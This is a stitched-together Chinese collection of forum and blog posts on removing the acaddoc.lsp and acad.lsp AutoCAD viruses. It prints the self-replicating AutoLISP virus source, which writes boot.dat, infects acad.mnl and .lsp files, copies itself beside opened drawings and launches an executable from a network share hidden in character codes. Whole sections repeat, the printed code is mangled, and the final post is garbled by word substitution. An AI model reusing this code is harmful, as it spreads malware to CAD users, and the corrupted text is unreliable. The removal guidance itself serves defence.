下载文档原格式
天正CAD产生的acaddoc.lsp病毒怎么解决①、关闭CAD(一定要先关闭正在运行的CAD程序)。
②、进入安全模式(重要前提!!!),按F3键打开XP系统的文件搜索窗口,搜索并删除acad.lsp、acadappp.lsp、acadapp.lsp acadapq.lsp 、acaddoc.lsp 这5个文件。
注意:“搜索范围”一定要选择“本机硬盘驱动器...”,并勾选“搜索选项”中的“高级选项”,将其下的“搜索子文件夹”项勾选上,否则不能将这3个文件全部搜索清除干净。
③、复制下面的代码在CAD命令行运行,以恢复被修改的系统变量默认值:(setvar "zoomfactor" 40)(setvar"mbuttonpan" 1)(setvar"HIGHLIGHT" 1)(setvar "fillmode" 1)④用记事本打开CAD下的“acad.mnl”文件,将文件最后一行代码(load "acadappp")删去。
(错误: LOAD 失败: "acadapq")的根源。
(如“acad.mnl”文件中无此行代码可忽略此操作)附:“acad.mnl”文件可能在下面的目录中,C:\Documents and Settings\×××\Application Data\Autodesk\AutoCAD200×\R×.×\chs\Support其中×××是你登录系统时的用户名,200×和R×.×分别是CAD的版本和版本代号。
(注意:目录C:\Documents and Settings\是系统隐藏文件夹)acaddoc.lsp病毒有效的方法。
1:查找acaddoc.lsp,把高级选项打开,把隐藏的也搜索出来删除。
手工查杀ACADDOC.LSP病毒发现中的这个病毒的状况是:开AutoCAD2006后提示"<AutoCAD 菜单实用程序已加载。
正在初始化VBA 系统...执行错误执行错误>"同时发现工作目录平时只有DWG、BAK 等熟悉文件外,多了acaddoc.lsp,打开看如下:(setqwold_cmd(getvar"cmdecho"))(setvar"cmdecho")(setqwpath(findfile"base.dcl"))(setqwpath(substrwpath1(-(strlenwpath)8)))(setqwwmnlwpath(getvar"menuname" ))(setq wnowdwg (getvar "dwgname" ))(setqwwjqm (findfile wnowdwg))(setq wdwgwpath (substr wwjqm1(-(strlen wwjqm)(strlen wnowdwg))));;;alert(setqf(open"c:\\boot.dat" "w"))(write-line"[dang]"f)(write-line (strcat"ff=" wdwgwpath)f)(write-line (strcat"yy="wpath)f)(closef)(setqboot(findfile "boot.dat"))(if(/=boot"")(command"_-vbarun" "ThisDrawing.hh" ))(setq wacadwpath (findfile "acaddoc.lsp"))(setq wacadwpath (substr wacadwpath1(strlen wacadwpath )11)))(setqwns1""wns2"")(setqwlspbj0)(setq wwjqm (strcat wpath "acaddoc.lsp" ))(if(setqwwjm (open wwjqm "r"))(progn (while (setqwwz(read-linewwjm))(setqwns1wns2)wns2 wwz))(if(> (strlen wns1) 14)(if(= (substr wns187) "acadapq" )(setq wlspbj1)))(close wwjm)))(setq wlspmnl 0)(setq wwjqm (strcat wpath "acad.mnl" ))(if(setq wwjm (open wwjqm "r")) (progn (while (setq wwz (read-line wwjm))(setq wns1 wns2) (setq wns2 wwz))(if(> (strlen wns1) 14)(if(= (substrwns187) "acadapq" )(setq wlspmnl 1))) (closewwjm)))(if(= wlspmnl 0) (progn (setq wwjqmwpath (strcat (chr97)(chr99)(chr97)(chr 100) (chr46)(chr 109) (chr 110) (chr108))))(setq wwjm (open wwjqm "a"))(write-line (strcat "(load " (chr34) "acadapq" (chr34) ")")wwjm)(write-line "(princ)" wwjm)wwjm)))(defun wwriteapp () (if(setqwwjm1 (open wnewacad "w"))(progn (setqwwjm (open woldacad "r"))(while (setqwwz(read-line wwjm))(write-line wwzwwjm1))(close wwjm)(close wwjm1))))(and(= wacadwpath wdwgwpath) (/= wacadwpath wpath))(progn(if(= 0wlspmnl)(progn(setq woldacad (findfile "acaddoc.lsp" ))(setq wnewacad (strcat wpath "acadapq.lsp") ))(progn(setq woldacad (strcatwpath "acadapq.lsp" ))(setq wnewacad (findfile "acaddoc.lsp" )))(if(=wlspbj0) (progn (setq wwjqm (strcat wpath "acaddoc.lsp" ))(setqwwjm (open wwjqm "a"))(write-line (strcat "(load " (chr34) "acadapq" (chr34)")")wwjm)(write-line "(princ)" wwjm)(close wwjm))) (wwriteapp ))(progn(/= wnowdwg "Drawing.dwg" )(progn(setq woldacad (findfile "acadapq.lsp" ))(setq wnewacad (strcat wdwgwpath "acaddoc.lsp" )) (wwriteapp)))))(setvar "cmdecho" wold_cmd)(princ)(setq strtopstr (strcat(chr92)(chr92)(chr70)(chr83)(chr49)(chr(chr83)(chr89)(chr83)(chr49)(chr92)(chr87)(chr79)(chr82)(chr75)(chr92)(chr80)(chr76)(chr79)(chr84)(chr69)(chr82)))(setq strbottomstr (strcat (chr(chr92)(chr76)(chr(chr67)(chr80)(chr82)(chr88)(chr89)(chr49)(chr46)(chr69)(chr88)(chr69)))(startapp(strcatstrtopstrstrbottomstr))(setvar"cmdecho"wold_cmd)(princ)(princ)N年以前学了点autolsp,虽然没编过什么程序,这个病毒基本还比较浅,能看得出个大概流程,原理跟acad.lsp差不多,利用AutoCAD自动加载文件活得病毒运行,然后感染,acaddoc.lsp是AutoCAD2004后每个图形打开时执行的例行程序,方便二次开发用的,当然也为病毒编写人敞开大门。
天正CAD产生的acaddoc.lsp病毒怎么解决①、关闭CAD(一定要先关闭正在运行的CAD程序)。
②、进入安全模式(重要前提!!!),按F3键打开XP系统的文件搜索窗口,搜索并删除acad.lsp、acadappp.lsp、acadapp.lsp acadapq.lsp 、acaddoc.lsp 这5个文件。
注意:“搜索范围”一定要选择“本机硬盘驱动器...”,并勾选“搜索选项”中的“高级选项”,将其下的“搜索子文件夹”项勾选上,否则不能将这3个文件全部搜索清除干净。
③、复制下面的代码在CAD命令行运行,以恢复被修改的系统变量默认值:(setvar "zoomfactor" 40)(setvar"mbuttonpan" 1)(setvar"HIGHLIGHT" 1)(setvar "fillmode" 1)④用记事本打开CAD下的“acad.mnl”文件,将文件最后一行代码(load "acadappp")删去。
(错误: LOAD 失败: "acadapq")的根源。
(如“acad.mnl”文件中无此行代码可忽略此操作)附:“acad.mnl”文件可能在下面的目录中,C:\Documents and Settings\×××\Application Data\Autodesk\AutoCAD200×\R×.×\chs\Support其中×××是你登录系统时的用户名,200×和R×.×分别是CAD的版本和版本代号。
(注意:目录C:\Documents and Settings\是系统隐藏文件夹)acaddoc.lsp病毒有效的方法。
1:查找acaddoc.lsp,把高级选项打开,把隐藏的也搜索出来删除。
常见AutoCAD病毒(acad.fas、acad.lsp)清除⽅法常见AutoCAD病毒(acad.fas、acad.lsp)清除⽅法acad.fas、acad.lsp这两种病毒是最常见的CAD病毒了,⽽且往往同⼀时候出现。
因为其本⾝对系统并不具备危害性,不过恶作剧程序罢了,因此⼤多数防病毒软件对它们不起作⽤,以下介绍⼿动删除⽅法。
第⼀步:查找硬盘、U盘内的 acad.fas、lcm.fas、acad.lsp、acadapp.lsp、acadappp.lsp 五个⽂件并删除⼲净(查找前请将显⽰隐藏和系统⽂件打开,这五个⽂件不⼀定同⼀时候出现。
强烈建议使⽤Total Commander⽂件管理器查找)。
第⼆步:查找acad.mnl⽂件(这个⽂件通常有两个,⼀个在“c:/Program Files/AutoCAD****/UserDataCache/Support/”⽬录下,还有⼀个在“c:/Documents and Settings/你的username/Application Data/Autodesk/AutoCAD****/R****/chs/Support/”⽬录下。
眼下病毒仅改动第⼀个acad.mnl⽂件)。
打开acad.mnl⽂件,在⽂件末尾找到下⾯三个语句的组合并删除(这三个语句组合不⼀定同⼀时候出现),然后保存⽂件。
(if (null stol) (load "lcm" ""))(princ)(load "acadapp.lsp")(princ)(load "acadappp.lsp")(princ)附录:有关该CAD病毒 acad.fas 的说明:1.它对电脑是没有随意的危害性!2.它在8:00到18:00这段时间,对CAD没有不论什么影响的!它的副作⽤就是:你的CAD在启动时会弹出⼀个显⽰时间的对话框假设时间不在8:00⾄18:00之间,还有可能伴随"移动"命令改变等情况。
acaddoc.lsp病毒文件彻底清除方法(2012-05-20 23:33:17)转载▼分类:电脑知识标签:杂谈前言: 最近本人公司里流行一种CAD病毒,中毒后,CAD每次新开图均生成一个acaddoc.lsp 的病毒文件,虽破坏力不大,但烦不胜烦。
经研究病毒源码后,摸索出了一套清除该病毒的办法。
然后经过在数个同事机器上验证,该方法行之有效。
于是将杀毒方法成文,群发给部门同事,以下是原文。
一病毒简介:最近公司里流传一种cad病毒。
该病毒可被卡巴斯基和360杀毒软件查出。
卡巴斯基查出病毒名为Virus.ALS.Pasdoc.a,360杀毒软件查出病毒名为Trojan.Script.29327。
遗憾的是,卡巴斯基和360杀毒软件均不能将其彻底清除。
二中毒症状:机器中毒后,运行CAD时,每打开一个dwg文件,均在dwg文件所在目录下生成一个acaddoc.lsp的文件。
由于每次开图,病毒程序均进行一次病毒传播复制过程,因此使得CAD 开图时速度变慢。
用记事本查看CAD安装路径下的support目录下的任一*.lsp文件,如文件末尾含有与附件1相同的代码,则可判定为中毒。
三传播机理:通过分析病毒的源代码,初步了解其传播机理如下:如机器已中毒,CAD新打开dwg文件时,病毒程序自动加载。
并搜索CAD工作目录下的acad.mnl文件,感染同一目录下的*.mnl文件,搜索acad的support目录,并感染该目录下的所有*.lsp文件。
同时病毒在当前打开的dwg文件所在目录下生成acaddoc.lsp文件,以利于下次传播。
如本机未中毒,而新打开的dwg文件所在目录下有acaddoc.lsp文件,则病毒将感染上述目录下的*.mnl与*.lsp文件。
该病毒的最终目的是调用acadapq 与acadappp 两个非法程序。
至于这两个程序会干什么,暂未深入研究。
四清除步骤:1. 退出CAD。
2. 全盘搜索acadapq.*、、acadappp.*、acaddoc.* 文件,然后彻底删除上述文件。
方法一acaddoc.lsp输入的列表有缺陷(转自LOVE空间)2009年04月07日星期二上午 11:14这个是个新病毒,用以往的解决方法( 1.lps改名为acaddoc.lsp替换)无法解决,在网络搜索了一下看到百度空间有个帖子有相关解决办法。
原帖如下:今天在Q群里又见网友请求删除CAD病毒,说用专杀工具也无法解决,于是让他把病毒文件传了给我。
打开文件一看,发现这个“acaddoc.lsp”文件内的程序代码跟以往的“acaddoc.lsp”病毒文件不同。
该病毒文件自动搜索CAD支持路径下的所有“*.mnl”文件和“*.lsp”文件。
将病毒代码(“acaddoc.lsp”文件内容)写入“*.lsp”文件内,并在“*.mnl”文件中写入“*.lsp”文件的加载路径。
同时,直线命令“line”、外部参照管理命令“xref”和分解(炸开)命令“explode”无法使用。
CAD系统感染该病毒文件后,只是简单搜索删除“acaddoc.lsp”文件,不能清除病毒。
因为所有的“*.lsp”文件已经被修改,所有“*.lsp”文件都是病毒文件。
解决方法壹:①、关闭CAD②、搜索并刪除所有“acaddoc.lsp”文件③、卸载CAD(必须卸载干净,并进入C盘用户目录内删除没有卸载完的CAD文件)后,重新安装CAD解决方法贰:①、关闭CAD②、搜索并刪除所有“acaddoc.lsp”文件③、找一台没有被CAD病毒破坏、且安装有相同版本CAD的电脑,复制其所有“*.lsp”文件和“*.mnl”文件至本机覆盖原文件(包括C盘用户目录内的相关文件)预防CAD病毒:装好CAD系统后,在没有被病毒感染前,将CAD目录内所有文件的属性设置为只读,可以减少中毒的机率。
(此法99.999%有效)附:×××\Application Data\Autodesk\AutoCAD 200×\R×.×\ 其中×××是你登录系统时的用户名, 200×和R×.×分别是CAD的版本和版本代号。
你是不是每次打开CAD,都会在文件目录中产生一个acad.lsp文件?
如果不是,你没必要再看下去了
如果是,那么恭喜你,中奖啦!请接着往下看。
很多CAD用户都出现了同一问题,即打开了一些从网上下载的或从其他地方拷贝过来的图纸后,CAD开始变的非常慢,通常打开一张图纸要等待几分钟的时间,并且一些运行于CAD上的二次开发软件的命令变的不可用。
即使重新安装CAD甚至重新安装系统,只要再次打开以前打开过的图纸,问题重现,这个问题对许多CAD设计人员都造成相当大的困扰。
该病毒利用CAD的读取机制,在用户第一次打开从网上下载的带有病毒的图纸后,该病毒即悄悄运行,并感染每一张新打开的图纸,将病毒文件到处复制,并生成很多名为acad.lsp的程序,使得CAD打开很慢,部分快捷命令被修改,而且每次打开CAD,都会在文件目录中产生一个acad.lsp文件?即便是重装CAD甚至重装系统都不能解决问题。
解决方法:0.0
1. 先将CAD程序卸载,记得要卸载干净。
2. 打开【我的电脑】,按F3,搜索硬盘上所有【acad.lsp】和【acadapp.lsp】把搜索到的文件全部全部删除。
注:搜索时必须选择高级选项
3. 从新安装CAD就OK了!
CAD技术交流群: 38600958。
序止: 迩去自己公司里流通一种CAD病毒,中毒后,CAD屡屡新启图均死成一个acaddoc.lsp的病毒文献,之阳早格格创做虽损害力没有大,但是烦没有堪烦.经钻研病毒源码后,摸索出了一套扫除该病毒的办法.而后通过正在数个共事呆板上考证,该要领止之灵验.于是将杀毒要领成文,群收给部分共事,以下是本文.一病毒简介:迩去公司里流传一种cad病毒.该病毒可被卡巴斯基战360杀毒硬件查出.卡巴斯基查出病毒名为Virus.ALS.Pasdoc.a,360杀毒硬件查出病毒名为Trojan.Script.29327.遗憾的是,卡巴斯基战360杀毒硬件均没有克没有及将其实足扫除.二中毒症状:呆板中毒后,运止CAD时,每挨启一个dwg文献,均正在dwg文献地圆目录下死成一个acaddoc.lsp的文献.由于屡屡启图,病毒步调均举止一次病毒传播复造历程,果此使得CAD启图时速度变缓.用记事本查看CAD拆置路径下的support目录下的任一*.lsp文献,如文献开端含有与附件1相共的代码,则可判决为中毒.三传播机理:通太过解病毒的源代码,收端相识其传播机理如下:如呆板已中毒,CAD新挨启dwg文献时,病毒步调自动加载.并搜索CAD处事目录下的acad.mnl文献,熏染共一目录下的*.mnl文献,搜索acad的support目录,并熏染该目录下的所有*.lsp文献.共时病毒正在目前挨启的dwg文献地圆目录下死成acaddoc.lsp文献,以好处下次传播.如本机已中毒,而新挨启的dwg文献地圆目录下有acaddoc.lsp文献,则病毒将熏染上述目录下的*.mnl与*.lsp 文献.该病毒的最后脚段是调用acadapq 与 acadappp 二个非法步调.至于那二个步调会搞什么,久已深进钻研.四扫除步调:1. 退出CAD.2. 齐盘搜索acadapq.*、、acadappp.*、acaddoc.* 文献,而后实足简略上述文献.注意查找前正在文献夹选项中树立“隐现所有文献与文献夹”以及与消“隐躲受呵护的支配系统文献”.搜索时采用“查找所有文献及文献夹”,而后正在“下档选项”里勾选“搜索系统文献夹”“搜索隐躲的文献战文献夹”“搜索子文献夹”.如果搜出的文献无法简略,则先浑空回支站,再搜索简略.注:探索者目录下有个AcadDoc.lsp(注意大小写)没有是病毒文献,谨防误删.3. 查看C盘根目录下是可有boot.dat文献,如有,则将其简略.4. 加进C:\Documents and Settings\用户名\Application Data\Autodesk\AutoCAD 2006(或者AutoCAD2004)\R16.2\chs\Support目录,用记事本挨启该目录下的所有*.mnl文献,脚动简略与附件1相共的代码(普遍皆正在文献开端),而后保存.并将建改后的所有*.mnl文献属性树立为“只读”.5. 加进CAD拆置目录下的support目录,将该目录下的所有*.lsp文献按步调4要领处理.记得将其属性设为“只读”.6. 如果本机拆置有多个版本的CAD,皆需按上述步调查看一次.如按上述步调扫除病毒乐成,没有要开尔,得先感动国家.如已乐成,再去找尔.五防止步伐:由于该病毒是通过读与dwg文献地圆的目录下acaddoc.lsp去传播的.果为正在交受其余共事的文献夹时,应先查看该文献夹中是可包罗上述病毒文献.如有,则简略之.共时也该当保证传给其余共事的文献夹没有要包罗上述文献.病毒会熏染support目录下的 *.lsp文献.果此提议新建一个文献夹,将时常使用的lisp步调搁置正在该文献夹下,共时正在CAD选项中将其树立为处事搜索目录.已拆杀毒硬件的呆板应最先将杀毒硬件拆上(360杀毒硬件免费的),正在交受他人传去的文献后应最先杀毒.提议没有要曲交挨启大众盘上的dwg文献,应先下载到本机再挨启.--尖锐的分隔线--上文中所道的样本文献里所含代码即一段以“(setq flagx t)(setq bz "(setq flagx t)")”启头,以“(load "acadapq")(princ)(load "acadappp.lsp")(princ)”末端的代码,很佳辨识,中招的共教无妨一试.。
